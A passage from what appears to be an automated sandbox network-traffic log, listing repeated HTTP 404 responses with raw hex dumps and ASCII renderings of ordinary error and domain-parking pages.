65 72 20 61 74 20 77 77 77 2e 30 39 31 32 31 30 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:17 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:20 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 30 Oct 2024 07:12:22 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:12:57 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:00 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:02 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Oct 2024 07:13:05 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 